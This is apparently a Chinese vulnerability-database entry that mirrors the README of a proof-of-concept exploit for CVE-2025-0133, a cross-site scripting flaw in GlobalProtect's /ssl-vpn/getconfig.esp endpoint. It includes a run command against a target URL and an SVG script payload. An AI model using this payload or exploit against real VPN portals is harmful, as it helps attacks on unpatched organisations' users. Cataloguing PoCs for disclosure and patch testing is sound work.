关联漏洞
描述
CVE-2025-0133 GlobalProtect XSS
介绍
# mitsec_vpn_xss_exploit
🔓 Exploit for GlobalProtect SSL VPN endpoint `/ssl-vpn/getconfig.esp` that appends a crafted XSS payload to the URL.
## Usage
```bash
python3 exploit.py -u https://target.com
```
## Parameters
- `-u`, `--url`: Base target URL (do **not** include query params)
## Payload Preview
```html
<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>
```
## Author
- GitHub: [ynsmroztas](https://github.com/ynsmroztas)
- Twitter: [@ynsmroztas](https://twitter.com/ynsmroztas)
文件快照
[4.0K] /data/pocs/e50fc724175e4caa369b5e41e75754bbb1473f66
├── [1.9K] exploit.py
├── [485K] Globalprotect-vpn.jpg
└── [ 529] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。